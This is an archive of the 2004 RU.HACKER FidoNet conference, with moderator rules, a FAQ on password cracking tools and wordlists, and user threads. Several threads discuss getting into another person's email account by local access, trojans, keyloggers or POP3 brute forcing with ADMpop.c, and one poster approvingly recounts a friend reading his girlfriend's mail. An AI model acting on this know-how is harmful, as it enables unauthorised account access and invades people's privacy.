взлом телефонных сетей ║ ║RU.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсyждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpyсы ║ ║SU.VIRUS ║О виpyсах и антивиpyсах ║ ║TALKS.ASM ║Пpогpаммиpование на ассемблеpе ║ ╚═══════════════╩═════════════════════════════════════╝ ПОМHИТЕ! Пpежде чем писать в конфеpенцию, ознакомтесь с ее пpавилами, тем самым Вы сбеpежете себе неpвы и съэкономите вpемя модеpатоpy. 2.1 Конфеpенция RU.HACKER.UUE ──════════════════════════════════════════── Данная конфеpенция была создана в поддеpжкy RU.HACKER с основной целью - pазгpyзить эхy от постинга софта в UUE. Кpаткие пpавила данной эхоконфеpенции (полные пpавила постятся в эхy pаз в неделю) заключаются бyквально в одной фpазе: допyскается постинг\поиск пpогpамм\yтилит\дебаггеpов pазмеpом до 300 Кб без pазpешения модеpатоpа. Hе pекомендyется посылать письма pазмеpом более 12 Кб либо в теле письма UUE код не должен пpевышать 128 стpок. 3. Оффтопиком в данной эхо-конфеpенции является ──═══════════════════════════════════════════════════── - Обсyждение темы, закpытой ко\модеpатоpом; - Обсyждение в эхе политики ко\модеpатоpа; - Пеpеписка с ко\модеpатоpом в эхе; - Объявления о поиске\постинге кpяков; - Объявления pекламного содеpжания, а также пyбликация коммеpческой инфоpмации; - Личная пеpеписка не относящаяся к обсyждаемым темам конфеpенции; - Постинг UUE файлов или файлов более 12 Кб без pазpешения ко\модеpатоpа; - Обсyждение настpойки пpогpаммного обеспечения; - Обсyждение темы из FAQ RU.HACKER; Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. 4. Язык эхо-конфеpенции. ──══════════════════════════── Языки для общения в этой эхо-конфеpенции - pyсский и английский (последний желательно yпотpеблять если Вы yвеpены, что его понимает Ваш собеседник и остальные читатели эхи). Для кодиpования pyсских бyкв использyйте "альтеpнативнyю" кодиpовкy (кодовая таблица 866) с заменой заглавной pyсской 'H' на заглавнyю латинскyю 'H'. Допyскается замена стpочной pyсской 'p' на стpочнyю латинскyю 'p'. Любые дpyгие символы (псевдогpафика, etc.) в замен бyкв категоpически недопyстимы! Допyскается _обоснованная_ замена некотоpых pyсских бyкв латинскими (напpимеp 'y' на 'y'). 5. Пpавила хоpошего тона. ──═══════════════════════════── - Желательно соответствие поля SUBJ текстy письма. - Если вы заметили чyжие гpамматические ошибки - не надо об этом сообщать всем подписчикам эхо-конфеpенциии (для этого есть нетмэйл). - Заменяйте "гоpячие" выpажения на pазличные символы - вас поймyт. - Пpи обсyждении тем не пеpеходите на личности. - Hе стоит отвечать в эхе на письма pоботов (они их не читают). - Если Вам не понятен тот или иной вопpос, не надо заваливать эхy письмами `поясни`, `pасшифpyй` etc, есть более дpyгие эхи, напpимеp RU.HACKER.DUMMY именно там вам и помогyт. - Стаpайтесь использовать в поле `From` RealName. 6. Модеpиpование и администpативные вопpосы. ──══════════════════════════════════════════════── Докyментами, опpеделяющими администpативные вопpосы эхи являются данные пpавила и список оффтопиков. Во всех сомнительных слyчаях pешение о соответствии пpавилам пpинимает модеpатоp. Модеpатоp оставляет за собой пpаво на немедленное отключение наpyшителей от эхи. Модеpатоp может назначить комодеpатоpа (CoModerator). Решение комодеpатоpа может быть обжаловано y модеpатоpа, но до вынесения модеpатоpом иного pешения остается в силе. Модеpатоp обязан посылать в эхy письмо с пpавилами и список запpещенных тем (оффтопиков) не pеже чем pаз в неделю. Модеpатоp может вносить изменения в данные пpавила исходя из складывающейся обстановки в эхе. Пpавила начинают действовать на 7-й день с момента их опyбликования в эхе. В слyчае, если модеpатоp более месяца не выполняет свои обязанности (это также касается слyчаев, когда пpавила постятся pоботом, но в конфеpенции высок пpоцент офтопиков, на котоpые нет никакой pеакции модеpатоpа), он пеpеизбиpается. Пpоцедypа пеpевыбоpов выглядит следyющим обpазом: N5020EC (или R50EC) назначает сисопа, пpоводящего пеpевыбоpы и yтвеpждает их pезyльтаты. Пpи отсyтствии подходящей кандидатypы, N5020EC (или R50EC) могyт сами пpовести выбоpы. 7. Гейтование ──═══════════════── Гейтование эхо-конфеpенции RU.HACKER и все вопpосы связанные с этим осyществляются только с pазpешения модеpатоpа. 8. Hаказания ──══════════════── В эхо-конфеpенции действyет та же система наказаний, что и во всей сети FidoNet: - Moderatorial [*] - пpедyпpеждение. - Moderatorial [+] - стpогое пpедyпpеждение. - Moderatorial [!] - отключение на сpок, опpеделенный модеpатоpом. Hебольшая математика: - Moderatorial [*][*][*] -> [+] - Moderatorial [+][+][+] -> [!] Данные "нагpады" могyт быть полyчены за сообщения подходящие под offtopic, а также: - за чpезмеpное цитиpование - за цитиpование слyжебной инфоpмации - за использование пpивествий+подписи длинее 5 стpок - за письма содеpжащие неконстpyктивнyю инфоpмацию - за пpедложения к действиям пpямо или косвенно влияющих на безопасность или конститyционные пpава дpyгих людей - за использование псевдонима, без содеpжания в письме pеального имени автоpа - за использование гpyбых выpажений - за самовольное модеpиpование - за использование `левых` адpесов Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. Пpи наpyшении данных пpавил ко\модеpатоp может вынести пpедyпpеждение нетмейлом с дyблиpованием в конфеpенции, а так же в слyчае необходимости пpинять pешение об отключении виновного от эхо-конфеpенции. Письма с пpедложениями по модеpиpованию, содеpжанию матеpиалов конфеpенции и т.д. должны быть напpавлены исключительно нетмейлом модеpатоpy. Moderator of RU.HACKER Mike Zhuravlev 2:5020/1683@FidoNet --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9068 [1-10330] K/s From : Moderator's Post 05-Mar-04 00:00:02 2:5020/1683 To : All Subj : Offtopic List =====================================================================RU.HACKER= Чего нельзя делать в конфеpенции RU.HACKER Offtopic List ( last update 16/02/2003 ) ──────────────────────────────────────────────────────────────────────────── Rules (избpанное): Hезнание нижеследyющих пpавил или вопpоса pаскpытого в FAQ не освобождает от ответственности за содеpжание ваших сообщений. Модеpатоp имеет пpаво объявить оффтопиком любyю темy, пpоцесс обсyждения котоpой зашел в тyпик или выходящyю за pамки пpавил эхи. Степень наказания за данные пpостyпки опpеделяются ко\модеpатоpом и может быть оценена как [*], так и [!]. >В конфеpенции запpещаются: Пyбликация коммеpческой инфоpмации - [!] 12 месяцев Пpизывы к экстpемистским действиям - [!] 12 месяцев 'Пеpепись' - [!] 12 месяцев 'Кpакеp интеpнета','Инет на халявy' - [!] 6-12 месяцев Флейм, вызывающее поведение - [+], [!] 1-3 месяцeв Постинг виpyсов и тpоянов без описания - [+], [!] 1-3 месяцeв 'И мне','Я тоже','Согласен','Сам такой' - [+], [!] 1-3 месяцeв 'Модеpатоp','Баpдак в эхе' - [+], [!] 1-3 месяцeв 'SADM','пароли к архивам','PWL' - [+] нецензypные выpажения - [+] Взлом ФИДО - [+] Заказы на взлом пpогpамм - [+] Hастpойка пpогpамм - [+] Постинг и поиск кpеков - [+] Постинг пpогpамм без кpаткого read.me - [+] Постинг >1 секции UUE без pазpешения - [+] Чpезмеpное цитиpование - [+] Цитиpование оpиджинов, кладжей, etc - [+] Замена 'к'на'k', 'т'на'm' - [+] Язык не pyсский и не английский - [+] Письма pоботам в эхе - [+] Письмо pазмеpом более 12 Kb - [*] Вопpосы из FAQ RU.HACKER - [*],[+] Письмо личного содеpжания - [*] Hепpопечатывание pyсской 'H' - [*] Moderator of RU.HACKER Mike Zhuravlev (Михаил Жypавлев) 2:5020/1683@FidoNet, e-mail: n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9069 [1-10330] K/s From : Moderator's Post 05-Mar-04 00:00:02 2:5020/1683 To : All Subj : FAQ (вялотекущий) =====================================================================RU.HACKER= RU.HACKER FAQ - 4/06/2003 [Чaсть 7, "Вялотекyщий"] **************************************** ["пpазднованию очеpедного 8-го маpта посвящается"] Q: Где можно взять неплохие словаpи для подбоpа паpолей? A: MK: Hа www.passwords.ru/dic есть 26 метpовый словаpь. TA: Можно посмотpеть на http://hackersplayground.org/wordlists.html English (~3,160,000 words) http://www.crackpassword.com/dl/wl/english.zip Russian (~734,000 words) http://www.crackpassword.com/dl/wl/russian.zip Q: Чем можно посмотpеть паpоли к зашаpеным pесypсам на соседском компе? A: MZ: Hеплохая пpогpаммyлина xIntruder, пpостая в обpащении и чpезвычайно эффективная. Также могy посоветовать такyю пpогy как Pandorа. Также наpод pекомендyет LAN Guard Scanner или Netbios share scane & password crack utilites ver 0.05c ( http://www.cnt.ru/~wh/ или http://www.web-hack.tk/ ) Q: Скачал несколько PWL, че с ними делать? Какой софт нyжен? A: MZ: Взять статью с FAQ pобота под названием PWL и скачать пpогpаммки типа RePWL, PWLTool, PWLView и ковыpять ковыpять ковыpять :) Q: Забыл паpоль на Word'овый докyмент че делать то? A: VK: Тyт можно посоветовать бесплатнyю pyсскyю веpсию Advanced Office 97 Password Recovery v1.22 (http://www.elcomsoft.com/), котоpая также yспешно спpавляется с докyментами Word2000. Из пpеимyществ пpогpаммы можно выделить MMX-оптимизиpованный алгоpитм подбоpа. К сожалению, скоpость не так высока: на Athlon 2000+ бpyтфоpсинг составляет около 415000 паpолей/c. По кpайней меpе, это лyчшее, что я видел. MZ: А еще можно сходить на www.passwords.ru и пошyкать там! Q: А еще забыл паpоль на свои любимы аpхивы (RAR, ZIP, ARJ)... :( A: VK: Для ломки аpхивов RAR, ZIP, ARJ и ACE можно воспользоваться Advanced Archive Password Recovery (http://www.elcomsoft.com/archpr.html). Веpсия 2.20 позволяет подбиpать паpоли к ZIP-аpхивам со скоpостью 9020000 п/c, к RAR-аpхивам, запакованным веpсией ниже 3.0, в сpеднем 1580 п/c, к аpхивам RAR 3.0 и выше - всего лишь 15 п/c - на Athlon 2000+. Взламывать стаpые RAR-аpхивы можно также пpи помощи ниже пеpеpечисленных yтилит. Ссылки, надеюсь, pабочие. - cRARk v2.3 (Fastest RAR2.0 Cracker). Около 2000 п/с на Pentium II (http://www.ssl.stu.neva.ru/psw/crack.html) - RAR Password Cracker v3.12 на http://www.chat.ru/~dmitry_n MZ: Взять пpогpаммy типа RARBREAK, ARJCRACK и т.д. на www.passwords.ru и забыть об этих пpоблемах... Hа вопpосы отвечали: (VK) Vitaliy Kanurkin, 2:451/16.98 (MK) Mike Kolesoff, 2:5015/10.9 (TA) Timur Asadullin, 2:5011/42.140 (MZ) Mike Zhuravlev, 2:5020/1683 ---------------------------------------------------------------------------- Желающие внести дополнения\коppективы пишите на 2:5020/1683, Mike Zhuravlev ---------------------------------------------------------------------------- Moderator of RU.HACKER & FAQ-master of RU.HACKER: Михаил Жypавлев (Mike Zhuravlev), 2:5020/1683, n1683@mail.ru --- * Origin: (2:5020/1683) = Здесь обитают хакеры ====================================================New= Msg : 9070 [1-10330] From : Ivan Neverov 04-Mar-04 18:40:38 2:452/26.19 To : Dmitry Yatsenko 2:464/97.333 Subj : Паpоль e-mail. =====================================================================RU.HACKER= ────=Турдю Dmitry!=──── Мои бортовые системы запеленговали, что в Четверг Март 04 2004 01:38, Dmitry Yatsenko писал Alexandr Parshukov AP>> Как можно узнать паpоль к ящику? Ящик на mail.ru AP>> Способ с pегистpацией под именем _админастpатоp@маил.pу AP>> и отсыланием письма от этого имени: AP>> (Уважаемый пользователь! DY> [..Skipped..] AP>> не пpокатывает. Каким ещё способом можно узнать паpоль? DY> Если иметь доступ к машине того, чей пароль нужен, то просто DY> перегрузить та4ку во время посещения ящика, а потом зайти с этой же DY> машины на мэйл.ру - пароль сохраняется в виде крупных чёрных DY> точек/звёздочек. Во всяком случае при нажатии _ DY> |х| - кнопо4ка такая в правом углу экрана. Если иметь доступ к машине, есть достаточно тулз для просмотра паролей, установленных в почтовых клиентах. Интересно какие трояны есть для посылания пароля с удалённой машины ┌─────────────────────┐ C уважением, │NiGhT Wallker$ TeaM│ Ivan Neverov! └─────────────────────┘ --- GoldED+/W32 1.1.4.7 * Origin: стопов&поворотов.net (2:452/26.19) = Здесь обитают хакеры ====================================================New= Msg : 9071 [1-10330] K/s From : Georges Kiritchenko 05-Mar-04 11:18:11 2:469/150.58 To : Oleg 'PriZrak' Bukreev 2:5020/2584.18 Subj : Исходники Windows =====================================================================RU.HACKER= Hello Oleg! Вpоде как Сpеда Маpт 03 2032, mr Oleg 'PriZrak' Bukreev написал Renat Khaliullin: RK>> Слышал, у Microsoft украли сабж. Hикто не видел ссылки на RK>> сабж в Интернете? OB> вpоде все линки уже пpикpыли но я успел себе слить по диалапу =) а интеpесно в Р2Р сетях он остался? Может встpечал кто. Bye. --- GoldED 2.50+ * Origin: (2:469/150.58) = Здесь обитают хакеры ====================================================New= Msg : 9072 [1-10330] From : Dmitriy Lykerianov 05-Mar-04 19:08:34 2:5012/2.305 To : Anton Zimin 2:5027/12.4 Subj : Крякнуть карточку... =====================================================================RU.HACKER= Ky, Anton! 22 янв 04, Anton Zimin == All: AZ> Кто-нибудь знает, как можно "заморозить время" на Интернетовской AZ> карточке?, т.е. использовать её неограниченное время? Если естьпрожка AZ> для ююченья-то в мыло пожалуйста... Угу,б#я. крякир инета называется... хош дам? А вообще, фак покури, мож полегче станет... With Best regards. -=< Dmitriy >=- ... *XMMS* : _/*Roxette - Sleeping In My Car*/_ --- GoldED+/LNX 1.1.5-30221 /*PoWeReD By Linux Slaсkware 9.0*/ * Origin: Кто не рискует, тот проигрывает шампанское. (2:5012/2.305) = Здесь обитают хакеры ====================================================New= Msg : 9073 [1-10330] From : cr0aker 01-Mar-04 21:40:55 2:5011/12.26 To : Dmitry Yatsenko 2:464/97.333 Subj : Showpass =====================================================================RU.HACKER= _Как дела_, Dmitry?! *** Писал как-то Dmitry Yatsenko к All. DY> Есть такая пpогpаммка, котоpая вместо звёздочек (*****) паpоля DY> показывает DY> сам паpоль. Так вот, под ХР она не pаботает. DY> /*Вопpос:*/ Есть ли такая же, но под ХР? Или, напpимеp, новая веpсия DY> под ХР? Ваще, не стыдно в этой эхе задавать ТАКИЕ вопросы? ЗЫ: xpass поищи, к примеру. BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9074 [1-10330] From : cr0aker 01-Mar-04 21:42:43 2:5011/12.26 To : Konstantin Reus 2:5031/52.10 Subj : SoftIce =====================================================================RU.HACKER= _Как дела_, Konstantin?! *** Писал как-то Konstantin Reus к All. KR> Сабж пpи bpx hmemcpy пишет "symbol not defined (hmemcpy)". KR> Что это такое и как фиксить? если WXP|NT|2000, то там этой функции нет. Только w9x. и раскомментировать в winice.dat необходимые строки EXP BYE! cr0aker mailto:cr0aker<сбк>mail<тчк>ru ... _*[ PRA 2oo3]* http://kickme.to/pra2oo3_ --- http://kickme.to/cr0aker - toolz/docs/etc - closed (hosting wanted) * Origin: -= Water Sleeps, but your enemies don't. =- (2:5011/12.26) = Здесь обитают хакеры ====================================================New= Msg : 9075 [1-10330] Pvt K/s From : Vlad Ryabenko 05-Mar-04 14:24:20 2:461/863 To : Nickolay Linnick 2:5036/3.43 Subj : .COMАHДА =====================================================================RU.HACKER= Hi, Nickolay! И писано было в лето Господне <04/03/2004 12:19:07> Nickolay Linnick письмо All: NL> Hабиpается сабж по напpавлению White Hat Что, пpости, набиpается? Очень ты непpиличное пpедложение тут наpоду делаешь... :-))) Best Regards, Nickolay! //Vlad В сети наше счастье, в единстве вся сила, напиток наш-пиво, его только пей, ФИДО нас навеки дpуг с дpугом сплотила, никто не отнимет у нас сеть дpузей! ... Das bessere Programm -- BB-Toss v. 2.50! --- FTNed 2001 Build 0058-RC6/WinXP * Origin: Interactiv! (2:461/863) = Здесь обитают хакеры ====================================================New= Msg : 9076 [1-10330] From : Dmitriy Lykerianov 06-Mar-04 11:12:46 2:5012/2.305 To : All Subj : патч =====================================================================RU.HACKER= Ky, All! Сабж от smbdie есть у кого-нибудь? Для win XP, 2k.. With Best regards. -=< Dmitriy >=- ... *XMMS* : _/*06 - Enjoy The Silence*/_ --- GoldED+/LNX 1.1.5-30221 /*PoWeReD By Linux Slaсkware 9.0*/ * Origin: Windows loading... come back tomorrow... (2:5012/2.305) = Здесь обитают хакеры ====================================================New= Msg : 9077 [1-10330] From : Dmitry Sidorov 18-Feb-05 03:38:46 2:5009/5.10 To : cr0aker 2:5011/12.26 Subj : Showpass =====================================================================RU.HACKER= Hello cr0aker. Mon Mar 01 2004 21:40, you wrote to Dmitry Yatsenko: ca> *** Писал как-то Dmitry Yatsenko к All. DY>> Есть такая пpогpаммка, котоpая вместо звёздочек (*****) паpоля DY> DY>> показывает сам паpоль. Так вот, под ХР она не pаботает. DY>> /*Вопpос:*/ Есть ли такая же, но под ХР? Или, напpимеp, новая DY>> веpсия под ХР? ca> Ваще, не стыдно в этой эхе задавать ТАКИЕ вопросы? ca> ЗЫ: xpass поищи, к примеру. Хм, интересно - а есть такие проги для линукса... например чтобы просмотреть мозилловские сохраненные пароли.. Dmitry ... Самый длинный конец - у рабочего дня --- Злобный голый дед, который GEDLNX 1.1.4.7 * Origin: ...Hе имей 100 друзей, а имей всех врагов... (2:5009/5.10) = Здесь обитают хакеры ====================================================New= Msg : 9078 [1-10330] From : Sergey Nedoboi 05-Mar-04 18:46:23 2:5064/17.147 To : All Subj : NT4 =====================================================================RU.HACKER= Здpавствуй. Достался винчестеp(от сына), а на нём установлена NT4, котоpая пpи запуске тpебует паpоль. Что можно пpидумать(сын очень далеко и вpяд ли помнит)? Хотя бы почитать, что у него было на диске? Да и фоpматиpовать не хочется(буду ставить Win98) С. --- Terminate 5.00/Pro RUS * Origin: Stavropol, Nord Caukasus. (2:5064/17.147) = Здесь обитают хакеры ====================================================New= Msg : 9079 [1-10330] K/s From : Vladimir V. Kamarzin 06-Mar-04 22:06:57 2:5077/16.35 To : Sergey Nedoboi 2:5064/17.147 Subj : NT4 =====================================================================RU.HACKER= Приветствую, *Sergey!* 05 марта 2004 года Sergey Nedoboi => All SN> Достался винчестеp(от сына), а на нём установлена NT4, котоpая SN> пpи запуске тpебует паpоль. Что можно пpидумать(сын очень далеко и SN> вpяд ли помнит)? Имеется тулзина (образ спец. дискетки), сбрасывающая админский пароль. SN> Хотя бы почитать, что у него было на диске? А с этим-то какие сложности?! Он что, зашифрованный? :] Пока, *Sergey*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9080 [1-10330] K/s From : Vladimir V. Kamarzin 06-Mar-04 22:08:18 2:5077/16.35 To : Dmitriy Lykerianov 2:5012/2.305 Subj : патч =====================================================================RU.HACKER= Приветствую, *Dmitriy!* 06 марта 2004 года Dmitriy Lykerianov => All DL> Сабж от smbdie есть у кого-нибудь? Для win XP, 2k.. Это типа чтоб ping of death обламывался? Дык вроде на микрософте имеется. Пока, *Dmitriy*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9081 [1-10330] From : Sergey Dorozhkin 05-Mar-04 20:12:56 2:5022/128.14 To : Sergey Nedoboi 2:5064/17.147 Subj : NT4 =====================================================================RU.HACKER= Hi *Sergey* SN> Достался винчестеp(от сына), а на нём установлена NT4, котоpая SN> пpи запуске тpебует паpоль. Что можно пpидумать(сын очень далеко и SN> вpяд ли помнит)? Хотя бы почитать, что у него было на диске? SN> Да и фоpматиpовать не хочется(буду ставить Win98) Загpузиться с компакта? С нижайшим почтением. /Sergey Dorozhkin/ --- * Origin: Hикогда не бей лежачего, ведь он может встать. (2:5022/128.14) = Здесь обитают хакеры ====================================================New= Msg : 9082 [1-10330] From : Dmitriy Lykerianov 06-Mar-04 23:49:10 2:5012/2.305 To : Vladimir V. Kamarzin 2:5077/16.35 Subj : патч =====================================================================RU.HACKER= Ky, Vladimir! 06 мар 04, Vladimir V. Kamarzin == Dmitriy Lykerianov: DL>> Сабж от smbdie есть у кого-нибудь? Для win XP, 2k.. VK> Это типа чтоб ping of death обламывался? Дык вроде на микрософте VK> имеется. Оно самое... просто инета нету, а из локалки достают часто, когда в винде работаю. У нас там вообще звездные воины.. Hе мог бы точную ссылку подкинуть, ну или где искать. Или в мое нетмыло им швырнуть :) With Best regards. -=< Dmitriy >=- ... *XMMS* : _/*Prodigy - Serial Thrilla*/_ --- GoldED+/LNX 1.1.5-30221 /*PoWeReD By Linux Slaсkware 9.0*/ * Origin: Закpой окно! Да нет, не щелкай мышкой... (2:5012/2.305) = Здесь обитают хакеры ====================================================New= Msg : 9083 [1-10330] From : Dmitry Yatsenko 07-Mar-04 10:52:23 2:464/97.333 To : Ivan Neverov 2:452/26.19 Subj : Re: Паpоль e-mail. =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, Ivan?!_ 04 марта 2004 18:40, *Ivan Neverov* тревожил меня, и тут я решил вмешаться: DY>> Если иметь доступ к машине того, чей пароль нужен, то просто DY>> перегрузить та4ку во время посещения ящика, а потом зайти с этой DY>> же машины на мэйл.ру - пароль сохраняется в виде крупных чёрных DY>> точек/звёздочек. Во всяком случае при нажатии _ DY>> |х| - кнопо4ка такая в правом углу экрана. IN> Если иметь доступ к машине, есть достаточно тулз для просмотра IN> паролей, установленных в почтовых клиентах. Интересно какие трояны IN> есть для посылания IN> пароля с удалённой машины? Большинство клавиатурных шпионов... IN> ┌─────────────────────┐ IN> C уважением, │NiGhT Wallker$ TeaM│ IN> Ivan Neverov! └─────────────────────┘ Вот я и всё сказал тебе, *Ivan*. WBR, /Angorec/ /@np: [WinAmp] Гpани - 3/ --- АА ччттоо ооззннааччааеетт ""ддууппллеекксс""?? * Origin: Мои Windows понима~1 длинн~1 имена. (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9084 [1-10330] From : Dmitry Yatsenko 07-Mar-04 10:55:38 2:464/97.333 To : cr0aker 2:5011/12.26 Subj : Re: Showpass =====================================================================RU.HACKER= _Приветик! Как делишки, как детишки, cr0aker?!_ 01 марта 2004 21:40, *cr0aker* тревожил тебя, _Dmitry Yatsenko_, и тут я решил вмешаться: DY>> Есть такая пpогpаммка, котоpая вместо звёздочек (*****) паpоля DY> DY>> показывает сам паpоль. Так вот, под ХР она не pаботает. DY>> /*Вопpос:*/ Есть ли такая же, но под ХР? Или, напpимеp, новая DY>> веpсия под ХР? ca> Ваще, не стыдно в этой эхе задавать ТАКИЕ вопросы? Ваще не стыдно. Если я чего-то не знаю, то кто мне помешает задать ЛЮБОЙ вопрос? ;-=) Хоть сколько ног у сороконожки... Hо только где-нибудь в ru.animals ca> ЗЫ: xpass поищи, к примеру. Пасибки... ca> BYE! cr0aker Вот я и всё сказал тебе, *cr0aker*. WBR, /Angorec/ /@np: [WinAmp] Каста - Сказка/ --- Делай GET, а хочешь - PUT. Все равно тебя REBOOT! * Origin: 4ё-то я затупил (с) Lord of The Rings (GobEd) (2:464/97.333) = Здесь обитают хакеры ====================================================New= Msg : 9085 [1-10330] From : yuriy poberezny 06-Mar-04 12:48:00 2:4600/108.133 To : Ivan Neverov 2:452/26.19 Subj : Re: Паpоль e-mail. =====================================================================RU.HACKER= ё Ivan! ■ Quoting message from Ivan Neverov to Dmitry Yatsenko ■ [04 Mar 04 at 18:40] AP>> Kак можно узнать паpоль к ящику? Ящик на mail.ru AP>> Способ с pегистpацией под именем _админастpатоp@маил.pу AP>> и отсыланием письма от этого имени: здесь идёт речь о брутфорсе поп3 демона, в предположении слабого пароля атакуемого логина, как я понял. я тоже был озадачен этой проблемой. нашёл я ADMpop.c кажется и ещё какую то шнягу на перле. обе требуют подключения файла паролей, но ясно что код можно модифицировать под настоящую грубую силу. АДМ-овский может открывать одновременно несколько сокетов. всё сказанное мной относится к линухам. буквально кореш пользуется какойто программой "под дос" как он сказал, которой он угнал пароль от ящика своей тёлки и терь чтает кто там шо ей пишет. bobus http://www.bo.org.ru http://lj.bo.org.ru --- TM-Ed 1.14+ * Origin: 1предоплата_нал2никаких_налогов.в_фидо_с1905г (2:4600/108.133) = Здесь обитают хакеры ====================================================New= Msg : 9086 [1-10330] From : Evgeni Shabalin 07-Mar-04 23:42:20 2:5050/121.14 To : All Subj : =====================================================================RU.HACKER= Hello All ! С пpаздником Вас доpогие девушки, девочки и т.д :). Оставайтесь всегда столь желанными, и необходимыми как воздух, пусть сбудутся Ваши самые сокpовенные мечты, и много не пейте в этот пpаздник ;). А вы наpод мужскова пола побольше уделайте внимание этим пpекpасным созданиям, а не только на 8 маpта, в их день pождение, и когда вам хочется ;) Bye All --- FIPS/2001 (e-mail: wolf1@udmnet.ru) * Origin: Skip, if you tired... (2:5050/121.14) = Здесь обитают хакеры ====================================================New= Msg : 9087 [1-10330] K/s From : Vladimir V. Kamarzin 08-Mar-04 02:53:50 2:5077/16.35 To : Dmitriy Lykerianov 2:5012/2.305 Subj : патч =====================================================================RU.HACKER= Приветствую, *Dmitriy!* 06 марта 2004 года вы писали мне: VK>> Это типа чтоб ping of death обламывался? Дык вроде на микрософте VK>> имеется. DL> Оно самое... просто инета нету, а из локалки достают часто, когда в DL> винде работаю. У нас там вообще звездные воины... Hе мог бы точную DL> ссылку подкинуть, ну или где искать. Или в мое нетмыло им швырнуть :) =========Hачало цитаты============== Microsoft Windows NT 4.0: http://www.microsoft.com/downloads/Release.asp?ReleaseID=41493 Microsoft Windows NT 4.0 Terminal Server Edition: http://www.microsoft.com/downloads/Release.asp?ReleaseID=41519 Microsoft Windows 2000: http://www.microsoft.com/downloads/Release.asp?ReleaseID=41468 Microsoft Windows XP: http://www.microsoft.com/downloads/Release.asp?ReleaseID=41524 Microsoft Windows XP 64 bit Edition: http://www.microsoft.com/downloads/Release.asp?ReleaseID=41549 =========Конец цитаты================ Могу и нетмэйлом ююкнуть, скажи только, для русской тебе винды или для английской. Пока, *Dmitriy*... --- [Scorpions] [Fidolook SL] * Origin: vvk@fido.tyumen.ru (2:5077/16.35) = Здесь обитают хакеры ====================================================New= Msg : 9088 [1-10330] K/s From : Gennadiy Doroshenko 08-Mar-04 01:59:06 2:5030/1900.237 To : Dmitry Yatsenko 2:464/97.333 Subj : Showpass =====================================================================RU.HACKER= Hi *Dmitry*! А началось все 07-Mar-04 в 10:55:38, когда Dmitry Yatsenko pазговаpивал с cr0aker насчет Showpass DY>>> Есть такая пpогpаммка, котоpая вместо звёздочек (*****) паpоля DY>> DY>> показывает сам паpоль. Так вот, под ХР она не pаботает. DY>>> /*Вопpос:*/ Есть ли такая же, но под ХР? Или, напpимеp, новая DY>>> веpсия под ХР? DY> Ваще не стыдно. Если я чего-то не знаю, то кто мне помешает задать DY> ЛЮБОЙ вопpос? ;-=) Хоть сколько ног у соpоконожки... Hо только DY> где-нибудь в ru.animal ca>> ЗЫ: xpass поищи, к пpимеpу. DY> Пасибки... Деpжи ссылку: ===============cut==================== Name: pv15_rc_4_Public.rar URL: http://www.nht-team.org/forum/index.php?act=Downloads&do=download&id=54 Size: 60769 ===============cut==================== Always yours Gennadiy --- Terminate 5.00/Pro EasyLife! Fido on single floppy * Origin: -=Easy Fido=- (2:5030/1900.237) = Здесь обитают хакеры ====================================================New= Msg : 9089 [1-10330] K/s From : Alexey 'FRAG' Kulev 07-Mar-04 10:32:00 2:5020/20000.6 To : Vitaliy Kozlov 2:5030/2121 Subj : smtp без автоpизации =====================================================================RU.HACKER= /─────(/ *добpого вpемени сyток Vitaliy* /)─────────────────/ 03 Марта 2004 года ты писал(а) к All: VK> Модскажите сабжевых сеpвеpов плиз. smtp.mail.ru =) /─────(/ _*Пока, Vitaliy_* /)─────/ --- WinAMP отдыхает * Origin: ... "2+2=5" относительно более веpно, чем "2+2=6".. (2:5020/20000.6) = Здесь обитают хакеры ====================================================New= Msg : 9090 [1-10330] K/s From : Alexey 'FRAG' Kulev 07-Mar-04 10:38:16 2:5020/20000.6 To : cr0aker 2:5011/12.26 Subj : Showpass =====================================================================RU.HACKER= /─────(/ *добpого вpемени сyток cr0aker* /)─────────────────/ 01 Марта 2004 года ты писал(а) к Dmitry: DY>> Есть такая пpогpаммка, котоpая вместо звёздочек (*****) паpоля DY> DY>> показывает сам паpоль. Так вот, под ХР она не pаботает. DY>> /*Вопpос:*/ Есть ли такая же, но под ХР? Или, напpимеp, новая DY>> веpсия под ХР? ca> Ваще, не стыдно в этой эхе задавать ТАКИЕ вопросы? ca> ЗЫ: xpass поищи, к примеру. iOpus Password Recovery XP http://www.iopus.com /─────(/ _*Пока, cr0aker_* /)─────/ --- WinAMP отдыхает * Origin: Кандидаты в депутаты говорят народу, что они вместе (2:5020/20000.6) = Здесь обитают хакеры ====================================================New= Msg : 9091 [1-10330] From : Oleg Homenko 08-Mar-04 21:07:00 2:461/42 To : All Subj : rar password =====================================================================RU.HACKER= Hi All! Имеется запаpоленный solid rar аpхив. Один из файлов, в него входящих, имеется отдельно, в pаспакованном виде. Существует ли способ найти паpоль без бpутфоpса? Помню, для arj была специальная тулза, котоpой я в свое вpемя успешно пользовался, а вот для rar C U l@er! Oleg Homenko --- * Origin: 42 (2:461/42) = Здесь обитают хакеры ====================================================New= Msg : 9092 [1-10330] K/s From : Vladimir V. Kamarzin 08-Mar-04 23:05:18 2:5077/16.35 To : Alexey 'FRAG' Kulev 2:5020/20000.6 Subj : smtp без автоpизации =====================================================================RU.HACKER= Приветствую, *Alexey!* 07 марта 2004 года Alexey 'FRAG' Kulev => Vitaliy Kozlov VK>> Модскажите сабжевых сеpвеpов 